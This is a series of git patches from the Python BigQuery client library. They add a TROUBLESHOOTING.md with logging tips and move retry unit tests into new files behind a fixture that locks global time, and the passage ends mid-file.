"query": { + "statementType": "SELECT", + "totalBytesProcessed": 123, + "schema": { + "fields": [ + {"name": "_f0", "type": "INTEGER"}, + ], + }, + }, + }, + "configuration": { + "dryRun": True, + }, + "status": {"state": "DONE"}, + } + ), + ] + callback = mock.Mock() + config = bigquery.QueryJobConfig() + config.destination = "proj.dset.table" + config.dry_run = True + result = client._query_and_wait_bigframes( + query="SELECT 1", job_config=config, callback=callback + ) + callback.assert_not_called() + assert result.total_bytes_processed == 123 + assert result.schema == [bigquery.SchemaField("_f0", "INTEGER")] + + +def test_query_and_wait_bigframes_with_query_retry_callbacks(client): + created = datetime.datetime( + 2025, 8, 18, 10, 11, 12, 345000, tzinfo=datetime.timezone.utc + ) + started = datetime.datetime( + 2025, 8, 18, 10, 11, 13, 456000, tzinfo=datetime.timezone.utc + ) + ended = datetime.datetime( + 2025, 8, 18, 10, 11, 14, 567000, tzinfo=datetime.timezone.utc + ) + client._http.request.side_effect = [ + exceptions.InternalServerError( + "first try", errors=({"reason": "jobInternalError"},) + ), + make_response( + { + # https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query + "location": LOCATION, + "queryId": "abcdefg", + "totalRows": "100", + "totalBytesProcessed": "123", + "totalSlotMs": "987", + "jobComplete": True, + "creationTime": _to_millis(created), + "startTime": _to_millis(started), + "endTime": _to_millis(ended), + } + ), + ] + callback = mock.Mock() + client._query_and_wait_bigframes(query="SELECT 1", callback=callback) + callback.assert_has_calls( + [ + mock.call( + _job_helpers.QuerySentEvent( + query="SELECT 1", + billing_project=PROJECT, + location=LOCATION, + # No job ID, because a basic query is eligible for jobs.query. + job_id=None, + request_id=mock.ANY, + ) + ), + mock.call( + _job_helpers.QueryRetryEvent( + query="SELECT 1", + billing_project=PROJECT, + location=LOCATION, + # No job ID, because a basic query is eligible for jobs.query. + job_id=None, + request_id=mock.ANY, + ) + ), + mock.call( + _job_helpers.QueryFinishedEvent( + billing_project=PROJECT, + location=LOCATION, + query_id=mock.ANY, + total_rows=100, + total_bytes_processed=123, + slot_millis=987, + created=created, + started=started, + ended=ended, + # No job ID or destination, because a basic query is eligible for jobs.query. + job_id=None, + destination=None, + ), + ), + ] + ) From b68483227693ea68f6b12eacca2be1803cffb1d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 18 Aug 2025 13:02:13 -0500 Subject: [PATCH 161/202] docs: add a TROUBLESHOOTING.md file with tips for logging (#2262) * docs: add a TROUBLESHOOTING.md file with tips for logging * typo * finish my sentence --------- Co-authored-by: Lingqing Gan --- TROUBLESHOOTING.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 TROUBLESHOOTING.md diff --git a/TROUBLESHOOTING.md b/TROUBLESHOOTING.md new file mode 100644 index 000000000..7da12c440 --- /dev/null +++ b/TROUBLESHOOTING.md @@ -0,0 +1,34 @@ +# Troubleshooting steps + +## Enable logging of BQ Storage Read API session creation + +It can be helpful to get the BQ Storage Read API session to allow the BigQuery +backend team to debug cases of API instability. The logs that share the session +creation are in a module-specific logger. To enable the logs, refer to the +following code sample: + +```python +import logging +import google.cloud.bigquery + +# Configure the basic logging to show DEBUG level messages +log_formatter = logging.Formatter( + '%(asctime)s - %(levelname)s - %(message)s' +) +handler = logging.StreamHandler() +handler.setFormatter(log_formatter) +default_logger = logging.getLogger() +default_logger.setLevel(logging.DEBUG) +default_logger.addHandler(handler) +to_dataframe_logger = logging.getLogger("google.cloud.bigquery._pandas_helpers") +to_dataframe_logger.setLevel(logging.DEBUG) +to_dataframe_logger.addHandler(handler) + +# Example code that touches the BQ Storage Read API. +bqclient = google.cloud.bigquery.Client() +results = bqclient.query_and_wait("SELECT * FROM `bigquery-public-data.usa_names.usa_1910_2013`") +print(results.to_dataframe().head()) +``` + +In particular, watch for the text "with BQ Storage API session" in the logs +to get the streaming API session ID to share with your support person. From d41fd5c7475d2cb7f7afc4cd5aaa080abfe831e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 20 Aug 2025 14:36:03 -0500 Subject: [PATCH 162/202] chore: execute retry tests serially, since they depend on global time (#2265) * chore: migrate test_base retry tests * migrate job_helpers test * migrate more tests * fix initiate resumable upload tests * fix failing tests * remove dead test code --- tests/unit/conftest.py | 13 + tests/unit/job/test_async_job_retry.py | 139 +++++ tests/unit/job/test_base.py | 104 ---- tests/unit/job/test_query.py | 196 ------ tests/unit/job/test_query_job_retry.py | 229 +++++++ tests/unit/test__job_helpers.py | 105 ---- tests/unit/test__job_helpers_retry.py | 122 ++++ tests/unit/test_client.py | 587 ------------------ tests/unit/test_client_bigframes.py | 2 +- .../test_client_resumable_media_upload.py | 433 +++++++++++++ tests/unit/test_client_retry.py | 279 +++++++++ tests/unit/test_job_retry.py | 18 +- 12 files changed, 1226 insertions(+), 1001 deletions(-) create mode 100644 tests/unit/job/test_async_job_retry.py create mode 100644 tests/unit/job/test_query_job_retry.py create mode 100644 tests/unit/test__job_helpers_retry.py create mode 100644 tests/unit/test_client_resumable_media_upload.py create mode 100644 tests/unit/test_client_retry.py diff --git a/tests/unit/conftest.py b/tests/unit/conftest.py index ebe2d2a7a..5070a199b 100644 --- a/tests/unit/conftest.py +++ b/tests/unit/conftest.py @@ -13,6 +13,7 @@ # limitations under the License. from unittest import mock +import threading import pytest @@ -24,6 +25,18 @@ def client(): yield make_client() +time_lock = threading.Lock() + + +@pytest.fixture +def global_time_lock(): + """Fixture to run tests serially that depend on the global time state, + such as tests of retry behavior. + """ + with time_lock: + yield + + @pytest.fixture def PROJECT(): yield "PROJECT" diff --git a/tests/unit/job/test_async_job_retry.py b/tests/unit/job/test_async_job_retry.py new file mode 100644 index 000000000..35041aa1b --- /dev/null +++ b/tests/unit/job/test_async_job_retry.py @@ -0,0 +1,139 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from unittest import mock + +import google.api_core.retry +from google.api_core import exceptions + +from . import helpers +import google.cloud.bigquery.job + + +PROJECT = "test-project" +JOB_ID = "test-job-id" + + +def test_cancel_w_custom_retry(global_time_lock): + from google.cloud.bigquery.retry import DEFAULT_RETRY + + api_path = "/projects/{}/jobs/{}/cancel".format(PROJECT, JOB_ID) + resource = { + "jobReference": { + "jobId": JOB_ID, + "projectId": PROJECT, + "location": None, + }, + "configuration": {"test": True}, + } + expected = resource.copy() + expected["statistics"] = {} + response = {"job": resource} + conn = helpers.make_connection( + ValueError, + response, + ) + client = helpers._make_client(project=PROJECT, connection=conn) + job = google.cloud.bigquery.job._AsyncJob( + google.cloud.bigquery.job._JobReference(JOB_ID, PROJECT, "EU"), client + ) + + retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + lambda exc: isinstance(exc, ValueError) + ) + + with mock.patch( + "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" + ) as final_attributes: + result = job.cancel(retry=retry, timeout=7.5) + + final_attributes.assert_called() + + assert result is True + assert job._properties == expected + conn.api_request.assert_has_calls( + [ + mock.call( + method="POST", + path=api_path, + query_params={"location": "EU"}, + timeout=7.5, + ), + mock.call( + method="POST", + path=api_path, + query_params={"location": "EU"}, + timeout=7.5, + ), # was retried once + ], + ) + + +def test_result_w_retry_wo_state(global_time_lock): + from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT + + begun_job_resource = helpers._make_job_resource( + job_id=JOB_ID, project_id=PROJECT, location="EU", started=True + ) + done_job_resource = helpers._make_job_resource( + job_id=JOB_ID, + project_id=PROJECT, + location="EU", + started=True, + ended=True, + ) + conn = helpers.make_connection( + exceptions.NotFound("not normally retriable"), + begun_job_resource, + exceptions.NotFound("not normally retriable"), + done_job_resource, + ) + client = helpers._make_client(project=PROJECT, connection=conn) + job = google.cloud.bigquery.job._AsyncJob( + google.cloud.bigquery.job._JobReference(JOB_ID, PROJECT, "EU"), client + ) + custom_predicate = mock.Mock() + custom_predicate.return_value = True + custom_retry = google.api_core.retry.Retry( + predicate=custom_predicate, + initial=0.001, + maximum=0.001, + deadline=0.1, + ) + assert job.result(retry=custom_retry) is job + + begin_call = mock.call( + method="POST", + path=f"/projects/{PROJECT}/jobs", + data={ + "jobReference": { + "jobId": JOB_ID, + "projectId": PROJECT, + "location": "EU", + } + }, + timeout=None, + ) + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={ + "projection": "full", + "location": "EU", + }, + timeout=DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + [begin_call, begin_call, reload_call, reload_call] + ) diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index aa3d49ce3..f5861f645 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -17,8 +17,6 @@ import unittest from unittest import mock -from google.api_core import exceptions -import google.api_core.retry from google.api_core.future import polling import pytest @@ -882,50 +880,6 @@ def test_cancel_explicit(self): ) self.assertEqual(job._properties, expected) - def test_cancel_w_custom_retry(self): - from google.cloud.bigquery.retry import DEFAULT_RETRY - - api_path = "/projects/{}/jobs/{}/cancel".format(self.PROJECT, self.JOB_ID) - resource = { - "jobReference": { - "jobId": self.JOB_ID, - "projectId": self.PROJECT, - "location": None, - }, - "configuration": {"test": True}, - } - expected = resource.copy() - expected["statistics"] = {} - response = {"job": resource} - job = self._set_properties_job() - - api_request_patcher = mock.patch.object( - job._client._connection, "api_request", side_effect=[ValueError, response] - ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( - lambda exc: isinstance(exc, ValueError) - ) - - with api_request_patcher as fake_api_request: - with mock.patch( - "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" - ) as final_attributes: - result = job.cancel(retry=retry, timeout=7.5) - - final_attributes.assert_called() - - self.assertTrue(result) - self.assertEqual(job._properties, expected) - self.assertEqual( - fake_api_request.call_args_list, - [ - mock.call(method="POST", path=api_path, query_params={}, timeout=7.5), - mock.call( - method="POST", path=api_path, query_params={}, timeout=7.5 - ), # was retried once - ], - ) - def test__set_future_result_wo_done(self): client = _make_client(project=self.PROJECT) job = self._make_one(self.JOB_ID, client) @@ -1069,64 +1023,6 @@ def test_result_default_wo_state(self): ) conn.api_request.assert_has_calls([begin_call, begin_call, reload_call]) - def test_result_w_retry_wo_state(self): - from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT - - begun_job_resource = _make_job_resource( - job_id=self.JOB_ID, project_id=self.PROJECT, location="EU", started=True - ) - done_job_resource = _make_job_resource( - job_id=self.JOB_ID, - project_id=self.PROJECT, - location="EU", - started=True, - ended=True, - ) - conn = make_connection( - exceptions.NotFound("not normally retriable"), - begun_job_resource, - exceptions.NotFound("not normally retriable"), - done_job_resource, - ) - client = _make_client(project=self.PROJECT, connection=conn) - job = self._make_one( - self._job_reference(self.JOB_ID, self.PROJECT, "EU"), client - ) - custom_predicate = mock.Mock() - custom_predicate.return_value = True - custom_retry = google.api_core.retry.Retry( - predicate=custom_predicate, - initial=0.001, - maximum=0.001, - deadline=0.1, - ) - self.assertIs(job.result(retry=custom_retry), job) - - begin_call = mock.call( - method="POST", - path=f"/projects/{self.PROJECT}/jobs", - data={ - "jobReference": { - "jobId": self.JOB_ID, - "projectId": self.PROJECT, - "location": "EU", - } - }, - timeout=None, - ) - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={ - "projection": "full", - "location": "EU", - }, - timeout=DEFAULT_GET_JOB_TIMEOUT, - ) - conn.api_request.assert_has_calls( - [begin_call, begin_call, reload_call, reload_call] - ) - def test_result_explicit_w_state(self): conn = make_connection() client = _make_client(project=self.PROJECT, connection=conn) diff --git a/tests/unit/job/test_query.py b/tests/unit/job/test_query.py index 8f684c3e9..ef6429598 100644 --- a/tests/unit/job/test_query.py +++ b/tests/unit/job/test_query.py @@ -20,15 +20,11 @@ import types from unittest import mock -import freezegun -from google.api_core import exceptions -import google.api_core.retry import requests from google.cloud.bigquery.client import _LIST_ROWS_FROM_QUERY_RESULTS_FIELDS import google.cloud.bigquery._job_helpers import google.cloud.bigquery.query -import google.cloud.bigquery.retry from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT from google.cloud.bigquery.table import _EmptyRowIterator @@ -1335,102 +1331,6 @@ def test_result_with_max_results(self): [jobs_get_call, query_page_waiting_call, query_page_2_call] ) - def test_result_w_custom_retry(self): - from google.cloud.bigquery.table import RowIterator - - query_resource = { - "jobComplete": False, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - } - query_resource_done = { - "jobComplete": True, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, - "totalRows": "2", - } - job_resource = self._make_resource(started=True, location="asia-northeast1") - job_resource_done = self._make_resource( - started=True, ended=True, location="asia-northeast1" - ) - job_resource_done["configuration"]["query"]["destinationTable"] = { - "projectId": "dest-project", - "datasetId": "dest_dataset", - "tableId": "dest_table", - } - - connection = make_connection( - # Also, for each API request, raise an exception that we know can - # be retried. Because of this, for each iteration we do: - # jobs.get (x2) & jobs.getQueryResults (x2) - exceptions.NotFound("not normally retriable"), - job_resource, - exceptions.NotFound("not normally retriable"), - query_resource, - # Query still not done, repeat both. - exceptions.NotFound("not normally retriable"), - job_resource, - exceptions.NotFound("not normally retriable"), - query_resource, - exceptions.NotFound("not normally retriable"), - # Query still not done, repeat both. - job_resource_done, - exceptions.NotFound("not normally retriable"), - query_resource_done, - # Query finished! - ) - client = _make_client(self.PROJECT, connection=connection) - job = self._get_target_class().from_api_repr(job_resource, client) - - custom_predicate = mock.Mock() - custom_predicate.return_value = True - custom_retry = google.api_core.retry.Retry( - initial=0.001, - maximum=0.001, - multiplier=1.0, - deadline=0.1, - predicate=custom_predicate, - ) - - self.assertIsInstance(job.result(retry=custom_retry), RowIterator) - query_results_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/queries/{self.JOB_ID}", - query_params={"maxResults": 0, "location": "asia-northeast1"}, - # TODO(tswast): Why do we end up setting timeout to - # google.cloud.bigquery.client._MIN_GET_QUERY_RESULTS_TIMEOUT in - # some cases but not others? - timeout=mock.ANY, - ) - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={"projection": "full", "location": "asia-northeast1"}, - timeout=DEFAULT_GET_JOB_TIMEOUT, - ) - - connection.api_request.assert_has_calls( - [ - # See make_connection() call above for explanation of the - # expected API calls. - # - # Query not done. - reload_call, - reload_call, - query_results_call, - query_results_call, - # Query still not done. - reload_call, - reload_call, - query_results_call, - query_results_call, - # Query done! - reload_call, - reload_call, - query_results_call, - query_results_call, - ] - ) - def test_result_w_empty_schema(self): from google.cloud.bigquery.table import _EmptyRowIterator @@ -1455,102 +1355,6 @@ def test_result_w_empty_schema(self): self.assertEqual(result.location, "asia-northeast1") self.assertEqual(result.query_id, "xyz-abc") - def test_result_w_timeout_doesnt_raise(self): - import google.cloud.bigquery.client - - begun_resource = self._make_resource() - query_resource = { - "jobComplete": True, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, - } - done_resource = copy.deepcopy(begun_resource) - done_resource["status"] = {"state": "DONE"} - connection = make_connection(begun_resource, query_resource, done_resource) - client = _make_client(project=self.PROJECT, connection=connection) - job = self._make_one(self.JOB_ID, self.QUERY, client) - job._properties["jobReference"]["location"] = "US" - job._properties["status"] = {"state": "RUNNING"} - - with freezegun.freeze_time("1970-01-01 00:00:00", tick=False): - job.result( - # Test that fractional seconds are supported, but use a timeout - # that is representable as a floating point without rounding - # errors since it can be represented exactly in base 2. In this - # case 1.125 is 9 / 8, which is a fraction with a power of 2 in - # the denominator. - timeout=1.125, - ) - - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={"projection": "full", "location": "US"}, - timeout=1.125, - ) - get_query_results_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/queries/{self.JOB_ID}", - query_params={ - "maxResults": 0, - "location": "US", - }, - timeout=google.cloud.bigquery.client._MIN_GET_QUERY_RESULTS_TIMEOUT, - ) - connection.api_request.assert_has_calls( - [ - reload_call, - get_query_results_call, - reload_call, - ] - ) - - def test_result_w_timeout_raises_concurrent_futures_timeout(self): - import google.cloud.bigquery.client - - begun_resource = self._make_resource() - begun_resource["jobReference"]["location"] = "US" - query_resource = { - "jobComplete": True, - "jobReference": {"projectId": self.PROJECT, "jobId": self.JOB_ID}, - "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, - } - done_resource = copy.deepcopy(begun_resource) - done_resource["status"] = {"state": "DONE"} - connection = make_connection(begun_resource, query_resource, done_resource) - client = _make_client(project=self.PROJECT, connection=connection) - job = self._make_one(self.JOB_ID, self.QUERY, client) - job._properties["jobReference"]["location"] = "US" - job._properties["status"] = {"state": "RUNNING"} - - with freezegun.freeze_time( - "1970-01-01 00:00:00", auto_tick_seconds=1.0 - ), self.assertRaises(concurrent.futures.TimeoutError): - job.result(timeout=1.125) - - reload_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{self.JOB_ID}", - query_params={"projection": "full", "location": "US"}, - timeout=1.125, - ) - get_query_results_call = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/queries/{self.JOB_ID}", - query_params={ - "maxResults": 0, - "location": "US", - }, - timeout=google.cloud.bigquery.client._MIN_GET_QUERY_RESULTS_TIMEOUT, - ) - connection.api_request.assert_has_calls( - [ - reload_call, - get_query_results_call, - # Timeout before we can reload with the final job state. - ] - ) - def test_result_w_page_size(self): # Arrange query_results_resource = { diff --git a/tests/unit/job/test_query_job_retry.py b/tests/unit/job/test_query_job_retry.py new file mode 100644 index 000000000..c8355b688 --- /dev/null +++ b/tests/unit/job/test_query_job_retry.py @@ -0,0 +1,229 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +from unittest import mock + +import concurrent.futures +import freezegun +from google.api_core import exceptions +import google.api_core.retry +import pytest + +from google.cloud.bigquery.client import _MIN_GET_QUERY_RESULTS_TIMEOUT +from google.cloud.bigquery.job import QueryJob +from google.cloud.bigquery.retry import DEFAULT_GET_JOB_TIMEOUT +from google.cloud.bigquery.table import RowIterator + +from ..helpers import make_connection +from .helpers import _make_client + + +PROJECT = "test-project" +JOB_ID = "test-job-id" +QUERY = "select count(*) from persons" + + +def _make_resource(started=False, ended=False, location="US"): + resource = { + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID, "location": location}, + "status": {"state": "PENDING"}, + "configuration": { + "query": {"query": QUERY}, + "job_type": "query", + }, + "statistics": {"creationTime": "1"}, + } + + if started: + resource["status"]["state"] = "RUNNING" + resource["statistics"]["startTime"] = "2" + + if ended: + resource["status"]["state"] = "DONE" + resource["statistics"]["endTime"] = "3" + + return resource + + +def test_result_w_custom_retry(global_time_lock): + query_resource = { + "jobComplete": False, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + } + query_resource_done = { + "jobComplete": True, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + "totalRows": "2", + } + job_resource = _make_resource(started=True, location="asia-northeast1") + job_resource_done = _make_resource( + started=True, ended=True, location="asia-northeast1" + ) + job_resource_done["configuration"]["query"]["destinationTable"] = { + "projectId": "dest-project", + "datasetId": "dest_dataset", + "tableId": "dest_table", + } + + connection = make_connection( + # Also, for each API request, raise an exception that we know can + # be retried. Because of this, for each iteration we do: + # jobs.get (x2) & jobs.getQueryResults (x2) + exceptions.NotFound("not normally retriable"), + job_resource, + exceptions.NotFound("not normally retriable"), + query_resource, + # Query still not done, repeat both. + exceptions.NotFound("not normally retriable"), + job_resource, + exceptions.NotFound("not normally retriable"), + query_resource, + exceptions.NotFound("not normally retriable"), + # Query still not done, repeat both. + job_resource_done, + exceptions.NotFound("not normally retriable"), + query_resource_done, + # Query finished! + ) + client = _make_client(PROJECT, connection=connection) + job = QueryJob.from_api_repr(job_resource, client) + + custom_predicate = mock.Mock() + custom_predicate.return_value = True + custom_retry = google.api_core.retry.Retry( + initial=0.001, + maximum=0.001, + multiplier=1.0, + deadline=0.1, + predicate=custom_predicate, + ) + + assert isinstance(job.result(retry=custom_retry), RowIterator) + query_results_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/queries/{JOB_ID}", + query_params={"maxResults": 0, "location": "asia-northeast1"}, + timeout=mock.ANY, + ) + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={"projection": "full", "location": "asia-northeast1"}, + timeout=DEFAULT_GET_JOB_TIMEOUT, + ) + + connection.api_request.assert_has_calls( + [ + reload_call, + reload_call, + query_results_call, + query_results_call, + reload_call, + reload_call, + query_results_call, + query_results_call, + reload_call, + reload_call, + query_results_call, + query_results_call, + ] + ) + + +def test_result_w_timeout_doesnt_raise(global_time_lock): + begun_resource = _make_resource() + query_resource = { + "jobComplete": True, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + } + done_resource = begun_resource.copy() + done_resource["status"] = {"state": "DONE"} + connection = make_connection(begun_resource, query_resource, done_resource) + client = _make_client(project=PROJECT, connection=connection) + job = QueryJob(JOB_ID, QUERY, client) + job._properties["jobReference"]["location"] = "US" + job._properties["status"] = {"state": "RUNNING"} + + with freezegun.freeze_time("1970-01-01 00:00:00", tick=False): + job.result( + timeout=1.125, + ) + + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={"projection": "full", "location": "US"}, + timeout=1.125, + ) + get_query_results_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/queries/{JOB_ID}", + query_params={ + "maxResults": 0, + "location": "US", + }, + timeout=_MIN_GET_QUERY_RESULTS_TIMEOUT, + ) + connection.api_request.assert_has_calls( + [ + reload_call, + get_query_results_call, + reload_call, + ] + ) + + +def test_result_w_timeout_raises_concurrent_futures_timeout(global_time_lock): + begun_resource = _make_resource() + begun_resource["jobReference"]["location"] = "US" + query_resource = { + "jobComplete": True, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + } + done_resource = begun_resource.copy() + done_resource["status"] = {"state": "DONE"} + connection = make_connection(begun_resource, query_resource, done_resource) + client = _make_client(project=PROJECT, connection=connection) + job = QueryJob(JOB_ID, QUERY, client) + job._properties["jobReference"]["location"] = "US" + job._properties["status"] = {"state": "RUNNING"} + + with freezegun.freeze_time( + "1970-01-01 00:00:00", auto_tick_seconds=1.0 + ), pytest.raises(concurrent.futures.TimeoutError): + job.result(timeout=1.125) + + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={"projection": "full", "location": "US"}, + timeout=1.125, + ) + get_query_results_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/queries/{JOB_ID}", + query_params={ + "maxResults": 0, + "location": "US", + }, + timeout=_MIN_GET_QUERY_RESULTS_TIMEOUT, + ) + connection.api_request.assert_has_calls( + [ + reload_call, + get_query_results_call, + ] + ) diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 417f911b8..1f543f033 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -15,7 +15,6 @@ from typing import Any, Dict, Optional from unittest import mock -import freezegun import google.api_core.exceptions from google.api_core import retry as retries import pytest @@ -450,110 +449,6 @@ def test_query_and_wait_uses_jobs_insert(): ) -def test_query_and_wait_retries_job(): - freezegun.freeze_time(auto_tick_seconds=100) - client = mock.create_autospec(Client) - client._call_api.__name__ = "_call_api" - client._call_api.__qualname__ = "Client._call_api" - client._call_api.__annotations__ = {} - client._call_api.__type_params__ = () - client._call_api.side_effect = ( - google.api_core.exceptions.BadGateway("retry me"), - google.api_core.exceptions.InternalServerError("job_retry me"), - google.api_core.exceptions.BadGateway("retry me"), - { - "jobReference": { - "projectId": "response-project", - "jobId": "abc", - "location": "response-location", - }, - "jobComplete": True, - "schema": { - "fields": [ - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - {"name": "age", "type": "INT64", "mode": "NULLABLE"}, - ], - }, - "rows": [ - {"f": [{"v": "Whillma Phlyntstone"}, {"v": "27"}]}, - {"f": [{"v": "Bhetty Rhubble"}, {"v": "28"}]}, - {"f": [{"v": "Phred Phlyntstone"}, {"v": "32"}]}, - {"f": [{"v": "Bharney Rhubble"}, {"v": "33"}]}, - ], - }, - ) - rows = _job_helpers.query_and_wait( - client, - query="SELECT 1", - location="request-location", - project="request-project", - job_config=None, - page_size=None, - max_results=None, - retry=retries.Retry( - lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), - multiplier=1.0, - ).with_deadline( - 200.0 - ), # Since auto_tick_seconds is 100, we should get at least 1 retry. - job_retry=retries.Retry( - lambda exc: isinstance(exc, google.api_core.exceptions.InternalServerError), - multiplier=1.0, - ).with_deadline(600.0), - ) - assert len(list(rows)) == 4 - - # For this code path, where the query has finished immediately, we should - # only be calling the jobs.query API and no other request path. - request_path = "/projects/request-project/queries" - for call in client._call_api.call_args_list: - _, kwargs = call - assert kwargs["method"] == "POST" - assert kwargs["path"] == request_path - - -@freezegun.freeze_time(auto_tick_seconds=100) -def test_query_and_wait_retries_job_times_out(): - client = mock.create_autospec(Client) - client._call_api.__name__ = "_call_api" - client._call_api.__qualname__ = "Client._call_api" - client._call_api.__annotations__ = {} - client._call_api.__type_params__ = () - client._call_api.side_effect = ( - google.api_core.exceptions.BadGateway("retry me"), - google.api_core.exceptions.InternalServerError("job_retry me"), - google.api_core.exceptions.BadGateway("retry me"), - google.api_core.exceptions.InternalServerError("job_retry me"), - ) - - with pytest.raises(google.api_core.exceptions.RetryError) as exc_info: - _job_helpers.query_and_wait( - client, - query="SELECT 1", - location="request-location", - project="request-project", - job_config=None, - page_size=None, - max_results=None, - retry=retries.Retry( - lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), - multiplier=1.0, - ).with_deadline( - 200.0 - ), # Since auto_tick_seconds is 100, we should get at least 1 retry. - job_retry=retries.Retry( - lambda exc: isinstance( - exc, google.api_core.exceptions.InternalServerError - ), - multiplier=1.0, - ).with_deadline(400.0), - ) - - assert isinstance( - exc_info.value.cause, google.api_core.exceptions.InternalServerError - ) - - def test_query_and_wait_sets_job_creation_mode(): client = mock.create_autospec(Client) client.default_job_creation_mode = "JOB_CREATION_OPTIONAL" diff --git a/tests/unit/test__job_helpers_retry.py b/tests/unit/test__job_helpers_retry.py new file mode 100644 index 000000000..3ea4b1aae --- /dev/null +++ b/tests/unit/test__job_helpers_retry.py @@ -0,0 +1,122 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import freezegun +import google.api_core.exceptions +from google.api_core import retry as retries +import pytest + +from google.cloud.bigquery import _job_helpers + +from . import helpers + + +def test_query_and_wait_retries_job(global_time_lock): + with freezegun.freeze_time(auto_tick_seconds=100): + conn = helpers.make_connection( + google.api_core.exceptions.BadGateway("retry me"), + google.api_core.exceptions.InternalServerError("job_retry me"), + google.api_core.exceptions.BadGateway("retry me"), + { + "jobReference": { + "projectId": "response-project", + "jobId": "abc", + "location": "response-location", + }, + "jobComplete": True, + "schema": { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INT64", "mode": "NULLABLE"}, + ], + }, + "rows": [ + {"f": [{"v": "Whillma Phlyntstone"}, {"v": "27"}]}, + {"f": [{"v": "Bhetty Rhubble"}, {"v": "28"}]}, + {"f": [{"v": "Phred Phlyntstone"}, {"v": "32"}]}, + {"f": [{"v": "Bharney Rhubble"}, {"v": "33"}]}, + ], + }, + ) + client = helpers.make_client(project="client-project") + client._connection = conn + rows = _job_helpers.query_and_wait( + client, + query="SELECT 1", + location="request-location", + project="request-project", + job_config=None, + page_size=None, + max_results=None, + retry=retries.Retry( + lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), + multiplier=1.0, + ).with_deadline( + 200.0 + ), # Since auto_tick_seconds is 100, we should get at least 1 retry. + job_retry=retries.Retry( + lambda exc: isinstance( + exc, google.api_core.exceptions.InternalServerError + ), + multiplier=1.0, + ).with_deadline(600.0), + ) + assert len(list(rows)) == 4 + + # For this code path, where the query has finished immediately, we should + # only be calling the jobs.query API and no other request path. + request_path = "/projects/request-project/queries" + 